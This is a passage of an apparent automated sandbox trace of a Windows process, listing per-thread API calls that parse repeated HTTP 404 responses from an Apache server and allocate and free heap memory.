returned="\r\n\r\n\x08" [0254.214] GetProcessHeap () returned 0x690000 [0254.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0254.214] GetProcessHeap () returned 0x690000 [0254.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0254.214] GetProcessHeap () returned 0x690000 [0254.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 322 os_tid = 0x14d4 [0254.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0254.579] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:59 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.579] GetProcessHeap () returned 0x690000 [0254.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0254.580] GetProcessHeap () returned 0x690000 [0254.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0254.580] GetProcessHeap () returned 0x690000 [0254.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 323 os_tid = 0x14d8 [0255.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.204] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.204] GetProcessHeap () returned 0x690000 [0255.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0255.204] GetProcessHeap () returned 0x690000 [0255.204] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0255.204] GetProcessHeap () returned 0x690000 [0255.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 324 os_tid = 0x14dc [0255.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.392] GetProcessHeap () returned 0x690000 [0255.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0255.392] GetProcessHeap () returned 0x690000 [0255.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0255.392] GetProcessHeap () returned 0x690000 [0255.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 325 os_tid = 0x14e0 [0255.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.582] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:00 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.582] GetProcessHeap () returned 0x690000 [0255.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0255.582] GetProcessHeap () returned 0x690000 [0255.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0255.583] GetProcessHeap () returned 0x690000 [0255.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 326 os_tid = 0x14e4 [0255.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.784] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.784] GetProcessHeap () returned 0x690000 [0255.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0255.785] GetProcessHeap () returned 0x690000 [0255.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0255.785] GetProcessHeap () returned 0x690000 [0255.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 327 os_tid = 0x14e8 [0255.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.962] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.962] GetProcessHeap () returned 0x690000 [0255.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0255.962] GetProcessHeap () returned 0x690000 [0255.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0255.962] GetProcessHeap () returned 0x690000 [0255.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 328 os_tid = 0x14ec [0256.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.162] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.163] GetProcessHeap () returned 0x690000 [0256.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0256.163] GetProcessHeap () returned 0x690000 [0256.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0256.163] GetProcessHeap () returned 0x690000 [0256.163] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 329 os_tid = 0x14f0 [0256.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.373] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.373] GetProcessHeap () returned 0x690000 [0256.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0256.373] GetProcessHeap () returned 0x690000 [0256.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0256.373] GetProcessHeap () returned 0x690000 [0256.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 330 os_tid = 0x14f4 [0256.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.580] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:01 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.580] GetProcessHeap () returned 0x690000 [0256.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0256.580] GetProcessHeap () returned 0x690000 [0256.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0256.580] GetProcessHeap () returned 0x690000 [0256.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 331 os_tid = 0x14f8 [0256.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.791] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.791] GetProcessHeap () returned 0x690000 [0256.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0256.791] GetProcessHeap () returned 0x690000 [0256.791] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0256.791] GetProcessHeap () returned 0x690000 [0256.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 332 os_tid = 0x14fc [0257.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0257.561] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:02 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.562] GetProcessHeap () returned 0x690000 [0257.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0257.562] GetProcessHeap () returned 0x690000 [0257.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0257.562] GetProcessHeap () returned 0x690000 [0257.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 333 os_tid = 0x1500 [0258.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.240] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.240] GetProcessHeap () returned 0x690000 [0258.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0258.241] GetProcessHeap () returned 0x690000 [0258.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0258.241] GetProcessHeap () returned 0x690000 [0258.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 334 os_tid = 0x1508 [0258.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.500] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.501] GetProcessHeap () returned 0x690000 [0258.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0258.501] GetProcessHeap () returned 0x690000 [0258.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0258.501] GetProcessHeap () returned 0x690000 [0258.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 335 os_tid = 0x1510 [0258.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.761] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.761] GetProcessHeap () returned 0x690000 [0258.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0258.761] GetProcessHeap () returned 0x690000 [0258.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0258.761] GetProcessHeap () returned 0x690000 [0258.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 336 os_tid = 0x1514 [0258.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.978] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.978] GetProcessHeap () returned 0x690000 [0258.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0258.978] GetProcessHeap () returned 0x690000 [0258.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0258.978] GetProcessHeap () returned 0x690000 [0258.978] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 337 os_tid = 0x1518 [0259.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.185] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.186] GetProcessHeap () returned 0x690000 [0259.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0259.186] GetProcessHeap () returned 0x690000 [0259.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0259.186] GetProcessHeap () returned 0x690000 [0259.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 338 os_tid = 0x1520 [0259.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.462] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.462] GetProcessHeap () returned 0x690000 [0259.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0259.464] GetProcessHeap () returned 0x690000 [0259.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0259.464] GetProcessHeap () returned 0x690000 [0259.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 339 os_tid = 0x1524 [0259.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0259.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.583] GetProcessHeap () returned 0x690000 [0259.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0259.583] GetProcessHeap () returned 0x690000 [0259.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0259.583] GetProcessHeap () returned 0x690000 [0259.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 340 os_tid = 0x1528 [0260.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.016] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.016] GetProcessHeap () returned 0x690000 [0260.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0260.016] GetProcessHeap () returned 0x690000 [0260.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0260.016] GetProcessHeap () returned 0x690000 [0260.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 341 os_tid = 0x152c [0260.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.241] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.241] GetProcessHeap () returned 0x690000 [0260.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0260.241] GetProcessHeap () returned 0x690000 [0260.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0260.241] GetProcessHeap () returned 0x690000 [0260.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 342 os_tid = 0x1530 [0260.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0260.835] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.835] GetProcessHeap () returned 0x690000 [0260.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0260.835] GetProcessHeap () returned 0x690000 [0260.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0260.835] GetProcessHeap () returned 0x690000 [0260.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 343 os_tid = 0x1534 [0261.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.090] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.090] GetProcessHeap () returned 0x690000 [0261.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0261.090] GetProcessHeap () returned 0x690000 [0261.090] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0261.090] GetProcessHeap () returned 0x690000 [0261.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 344 os_tid = 0x1538 [0261.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.267] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.267] GetProcessHeap () returned 0x690000 [0261.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0261.267] GetProcessHeap () returned 0x690000 [0261.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0261.267] GetProcessHeap () returned 0x690000 [0261.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 345 os_tid = 0x1544 [0261.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0261.516] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.516] GetProcessHeap () returned 0x690000 [0261.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0261.516] GetProcessHeap () returned 0x690000 [0261.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0261.516] GetProcessHeap () returned 0x690000 [0261.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 346 os_tid = 0x1548 [0262.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.392] GetProcessHeap () returned 0x690000 [0262.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0262.392] GetProcessHeap () returned 0x690000 [0262.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0262.392] GetProcessHeap () returned 0x690000 [0262.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 347 os_tid = 0x154c [0262.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0262.961] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.961] GetProcessHeap () returned 0x690000 [0262.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0262.961] GetProcessHeap () returned 0x690000 [0262.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0262.961] GetProcessHeap () returned 0x690000 [0262.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 348 os_tid = 0x1550 [0263.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.348] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.348] GetProcessHeap () returned 0x690000 [0263.348] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0263.348] GetProcessHeap () returned 0x690000 [0263.348] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0263.348] GetProcessHeap () returned 0x690000 [0263.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 349 os_tid = 0x1554 [0263.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0263.720] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.720] GetProcessHeap () returned 0x690000 [0263.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0263.720] GetProcessHeap () returned 0x690000 [0263.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0263.720] GetProcessHeap () returned 0x690000 [0263.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 350 os_tid = 0x1558 [0264.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.077] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.096] GetProcessHeap () returned 0x690000 [0264.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0264.096] GetProcessHeap () returned 0x690000 [0264.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0264.096] GetProcessHeap () returned 0x690000 [0264.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 351 os_tid = 0x155c [0264.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.308] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.308] GetProcessHeap () returned 0x690000 [0264.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0264.308] GetProcessHeap () returned 0x690000 [0264.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0264.308] GetProcessHeap () returned 0x690000 [0264.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 352 os_tid = 0x1560 [0264.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0264.500] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; 